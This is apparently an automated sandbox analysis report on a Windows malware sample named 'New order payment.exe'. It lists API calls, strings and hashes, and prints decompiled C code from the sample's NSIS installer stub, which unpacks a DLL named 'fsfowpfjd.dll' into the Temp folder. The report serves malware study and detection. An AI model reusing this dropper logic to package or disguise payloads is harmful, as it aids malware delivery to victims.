                                                                • lstrlenA.KERNEL32(sclag,?,?,?,sclag,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                                                • lstrcmpiA.KERNEL32(?,.exe,sclag,?,?,?,sclag,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                                                • GetFileAttributesA.KERNEL32(sclag), ref: 004036EF
                                                                • LoadImageA.USER32 ref: 00403738
                                                                  • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                                                • RegisterClassA.USER32 ref: 0040377F
                                                                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                                                • CreateWindowExA.USER32 ref: 004037D0
                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                                                • GetClassInfoA.USER32 ref: 00403832
                                                                • GetClassInfoA.USER32 ref: 0040383F
                                                                • RegisterClassA.USER32 ref: 00403848
                                                                • DialogBoxParamA.USER32 ref: 00403867
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: "C:\Users\user\Desktop\New order payment.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$sclag$6B
                                                                • API String ID: 1975747703-3974761611
                                                                • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                                • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                                                • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                                • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402C55, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 80%
                                                                			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\New order payment.exe";
				 *0x423f4c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\New order payment.exe", 0x400);
				_t89 = E0040586F(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E00405B98("C:\\Users\\alfons\\Desktop", _t91);
				E00405B98(0x42c000, E004056D2(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x41f0e8 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x423f54 - _t82; // 0x8200
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x423f54; // 0x8200
						E004030B3(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x423f50 = _t94;
							 *0x423f58 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423f5c =  *0x423f5c + 1;
								__eflags =  *0x423f5c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405830(0x423f60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030B3( *0x40b0d8);
					_t65 = E00403081( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x423f54; // 0x8200
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403081(0x4170e8, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423f54;
						if( *0x423f54 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E00405830( &_v44, 0x4170e8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40b0d8; // 0x8200
						 *0x423fe0 =  *0x423fe0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423f54 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x41f0e8;
						if(_t93 <  *0x41f0e8) {
							_v12 = E00405F97(_v12, 0x4170e8, _t90);
						}
						 *0x40b0d8 =  *0x40b0d8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                                                0x00402c5d
                                                                0x00402c60
                                                                0x00402c63
                                                                0x00402c66
                                                                0x00402c6c
                                                                0x00402c7d
                                                                0x00402c82
                                                                0x00402c95
                                                                0x00402c9a
                                                                0x00402c9d
                                                                0x00402ca3
                                                                0x00000000
                                                                0x00402ca5
                                                                0x00402cb0
                                                                0x00402cb6
                                                                0x00402cc7
                                                                0x00402cce
                                                                0x00402cd4
                                                                0x00402cd6
                                                                0x00402cdb
                                                                0x00402cdd
                                                                0x00402dca
                                                                0x00402dcc
                                                                0x00402dd1
                                                                0x00402dd8
                                                                0x00000000
                                                                0x00000000
                                                                0x00402dda
                                                                0x00402ddd
                                                                0x00402e01
                                                                0x00402e06
                                                                0x00402e0c
                                                                0x00402e0e
                                                                0x00402e17
                                                                0x00402e1c
                                                                0x00402e1f
                                                                0x00402e20
                                                                0x00402e21
                                                                0x00402e23
                                                                0x00402e28
                                                                0x00402e2b
                                                                0x00402e3e
                                                                0x00402e42
                                                                0x00402e4a
                                                                0x00402e4f
                                                                0x00402e51
                                                                0x00402e51
                                                                0x00402e51
                                                                0x00402e59
                                                                0x00402e59
                                                                0x00402e5c
                                                                0x00402e5d
                                                                0x00402e5d
                                                                0x00402e60
                                                                0x00402e62
                                                                0x00402e62
                                                                0x00402e62
                                                                0x00402e6c
                                                                0x00402e72
                                                                0x00402e80
                                                                0x00402e85
                                                                0x00000000
                                                                0x00402e85
                                                                0x00000000
                                                                0x00402e2b
                                                                0x00402de5
                                                                0x00402df0
                                                                0x00402df5
                                                                0x00402df7
                                                                0x00000000
                                                                0x00000000
                                                                0x00402dfc
                                                                0x00402dff
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00402ce3
                                                                0x00402ce8
                                                                0x00402ce8
                                                                0x00402ced
                                                                0x00402cf1
                                                                0x00402cf8
                                                                0x00402cfd
                                                                0x00402cff
                                                                0x00402d01
                                                                0x00402d01
                                                                0x00402d05
                                                                0x00402d0a
                                                                0x00402d0c
                                                                0x00402e36
                                                                0x00402e2d
                                                                0x00000000
                                                                0x00402e2d
                                                                0x00402d12
                                                                0x00402d19
                                                                0x00402d95
                                                                0x00402d99
                                                                0x00402d9d
                                                                0x00402da2
                                                                0x00000000
                                                                0x00402d99
                                                                0x00402d22
                                                                0x00402d27
                                                                0x00402d2a
                                                                0x00402d2f
                                                                0x00000000
                                                                0x00000000
                                                                0x00402d31
                                                                0x00402d38
                                                                0x00000000
                                                                0x00000000
                                                                0x00402d3a
                                                                0x00402d41
                                                                0x00000000
                                                                0x00000000
                                                                0x00402d43
                                                                0x00402d4a
                                                                0x00000000
                                                                0x00000000
                                                                0x00402d4c
                                                                0x00402d53
                                                                0x00000000
                                                                0x00000000
                                                                0x00402d55
                                                                0x00402d5b
                                                                0x00402d64
                                                                0x00402d6a
                                                                0x00402d6d
                                                                0x00402d6f
                                                                0x00402d75
                                                                0x00000000
                                                                0x00000000
                                                                0x00402d7b
                                                                0x00402d7f
                                                                0x00402d87
                                                                0x00402d87
                                                                0x00402d8a
                                                                0x00402d8d
                                                                0x00402d8f
                                                                0x00402d91
                                                                0x00402d91
                                                                0x00000000
                                                                0x00402d8f
                                                                0x00402d81
                                                                0x00402d85
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00402da3
                                                                0x00402da3
                                                                0x00402da9
                                                                0x00402db5
                                                                0x00402db5
                                                                0x00402db8
                                                                0x00402dbe
                                                                0x00402dc0
                                                                0x00402dc0
                                                                0x00402dc8
                                                                0x00402dc8
                                                                0x00000000
                                                                0x00402dc8

                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00402C66
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\New order payment.exe,00000400), ref: 00402C82
                                                                  • Part of subcall function 0040586F: GetFileAttributesA.KERNEL32(00000003,00402C95,C:\Users\user\Desktop\New order payment.exe,80000000,00000003), ref: 00405873
                                                                  • Part of subcall function 0040586F: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                                • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New order payment.exe,C:\Users\user\Desktop\New order payment.exe,80000000,00000003), ref: 00402CCE
                                                                Strings
                                                                • "C:\Users\user\Desktop\New order payment.exe" , xrefs: 00402C55
                                                                • Error launching installer, xrefs: 00402CA5
                                                                • pA, xrefs: 00402CE3
                                                                • Inst, xrefs: 00402D3A
                                                                • C:\Users\user\Desktop\New order payment.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                                                                • C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
                                                                • Null, xrefs: 00402D4C
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5F
                                                                • soft, xrefs: 00402D43
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                • String ID: "C:\Users\user\Desktop\New order payment.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New order payment.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                                                • API String ID: 4283519449-3410181743
                                                                • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                                • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                                                • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                                • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 60%
                                                                			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004056F8(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040568B(E00405B98(0x409c10, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c10);
					E00405B98();
				}
				E00405DFA(0x409c10);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E93(0x409c10);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405850(0x409c10);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040586F(0x409c10, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E84(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fc8;
						goto L32;
					} else {
						E00405B98(0x40a410, 0x425000);
						E00405B98(0x425000, 0x409c10);
						E00405BBA(_t75, 0x40a410, 0x409c10, "C:\Users\alfons\AppData\Local\Temp\nspE59E.tmp\fsfowpfjd.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405B98(0x425000, 0x40a410);
						_t62 = E00405459("C:\Users\alfons\AppData\Local\Temp\nspE59E.tmp\fsfowpfjd.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fc8 =  &( *0x423fc8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c10);
								_push(0xfffffffa);
								E00404E84();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E84(0xffffffea,  *(_t85 - 0xc));
				 *0x423ff4 =  *0x423ff4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 8));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E8E(); // executed
				 *0x423ff4 =  *0x423ff4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffee);
					} else {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffe9);
						lstrcatA(0x409c10,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c10);
					E00405459();
					goto L29;
				}
				goto L33;
			}
















                                                                0x00401751
                                                                0x00401758
                                                                0x00401761
                                                                0x00401764
                                                                0x00401767
                                                                0x0040176c
                                                                0x00401774
                                                                0x00401790
                                                                0x00401776
                                                                0x00401776
                                                                0x00401777
                                                                0x00401777
                                                                0x00401796
                                                                0x004017a0
                                                                0x004017a0
                                                                0x004017a4
                                                                0x004017a7
                                                                0x004017ac
                                                                0x004017ae
                                                                0x004017b0
                                                                0x004017b5
                                                                0x004017b5
                                                                0x004017c0
                                                                0x004017c0
                                                                0x004017d1
                                                                0x004017d3
                                                                0x004017d3
                                                                0x004017d4
                                                                0x004017d4
                                                                0x004017d7
                                                                0x004017da
                                                                0x004017dd
                                                                0x004017dd
                                                                0x004017e4
                                                                0x004017f3
                                                                0x004017f8
                                                                0x004017fb
                                                                0x004017fe
                                                                0x00000000
                                                                0x00000000
                                                                0x00401800
                                                                0x00401803
                                                                0x0040185d
                                                                0x00401862
                                                                0x004015a8
                                                                0x0040268f
                                                                0x0040268f
                                                                0x004028be
                                                                0x004028c1
                                                                0x004028c1
                                                                0x00000000
                                                                0x00401805
                                                                0x0040180b
                                                                0x00401816
                                                                0x00401823
                                                                0x0040182e
                                                                0x00401844
                                                                0x00401844
                                                                0x00401847
                                                                0x00000000
                                                                0x0040184d
                                                                0x0040184d
                                                                0x0040184e
                                                                0x0040186b
                                                                0x004028c7
                                                                0x004028c7
                                                                0x004028c7
                                                                0x00401850
                                                                0x00401850
                                                                0x00401851
                                                                0x00401492
                                                                0x00402241
                                                                0x00402241
                                                                0x00402241
                                                                0x0040184e
                                                                0x00401847
                                                                0x004028c9
                                                                0x004028cd
                                                                0x004028cd
                                                                0x0040187b
                                                                0x00401880
                                                                0x00401886
                                                                0x00401887
                                                                0x00401888
                                                                0x0040188b
                                                                0x0040188e
                                                                0x00401893
                                                                0x00401899
                                                                0x0040189d
                                                                0x0040189f
                                                                0x004018a7
                                                                0x004018b3
                                                                0x004018a1
                                                                0x004018a1
                                                                0x004018a5
                                                                0x00000000
                                                                0x00000000
                                                                0x004018a5
                                                                0x004018bc
                                                                0x004018c2
                                                                0x004018c4
                                                                0x00000000
                                                                0x004018ca
                                                                0x004018ca
                                                                0x004018cd
                                                                0x004018e5
                                                                0x004018cf
                                                                0x004018d2
                                                                0x004018db
                                                                0x004018db
                                                                0x004018ea
                                                                0x004018ef
                                                                0x0040223c
                                                                0x00000000
                                                                0x0040223c
                                                                0x00000000

                                                                APIs
                                                                • lstrcatA.KERNEL32(00000000,00000000,sclag,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                                • CompareFileTime.KERNEL32(-00000014,?,sclag,sclag,00000000,00000000,sclag,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                                  • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,ebykawqyaa Setup,NSIS Error), ref: 00405BA5
                                                                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                  • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                  • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nspE59E.tmp$C:\Users\user\AppData\Local\Temp\nspE59E.tmp\fsfowpfjd.dll$sclag
                                                                • API String ID: 1941528284-2767477275
                                                                • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                                • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                                                • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                                • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402E8E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 94%
                                                                			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				intOrPtr _t91;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f0e0;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					_t91 =  *0x423f98; // 0x9776
					E004030B3(_t91 + _t60);
				}
				_t62 = E00403081( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E00403081(0x40b0e0, _t98) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x40b0e0, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E00403081(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00406005(0x40b050);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403081(0x40b0e0, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40b068 = 0x40b0e0;
						 *0x40b06c = _t99;
						while(1) {
							 *0x40b070 = _t88;
							 *0x40b074 = _v12; // executed
							_t74 = E00406025(0x40b050); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40b070; // 0x40f0e0
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423ff4 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404E84(0,  &_v88);
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40b070; // 0x40f0e0
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}
























                                                                0x00402e96
                                                                0x00402e9a
                                                                0x00402e9d
                                                                0x00402ea2
                                                                0x00402ea4
                                                                0x00402ea4
                                                                0x00402eab
                                                                0x00402eaf
                                                                0x00402eb3
                                                                0x00402eb5
                                                                0x00402eb5
                                                                0x00402eba
                                                                0x00402ebf
                                                                0x00402ec1
                                                                0x00402eca
                                                                0x00402eca
                                                                0x00402ed5
                                                                0x00402edc
                                                                0x0040302c
                                                                0x0040302c
                                                                0x00000000
                                                                0x00402ee2
                                                                0x00402ee6
                                                                0x00403017
                                                                0x0040306c
                                                                0x00403031
                                                                0x00403037
                                                                0x00403039
                                                                0x00403039
                                                                0x0040304a
                                                                0x00000000
                                                                0x0040304c
                                                                0x0040305f
                                                                0x00403011
                                                                0x00403011
                                                                0x0040302e
                                                                0x0040302e
                                                                0x00000000
                                                                0x00403066
                                                                0x00403066
                                                                0x00403069
                                                                0x00000000
                                                                0x00403069
                                                                0x0040305f
                                                                0x0040304a
                                                                0x00403077
                                                                0x00000000
                                                                0x00403077
                                                                0x0040301c
                                                                0x0040301e
                                                                0x0040301e
                                                                0x0040302a
                                                                0x00403074
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
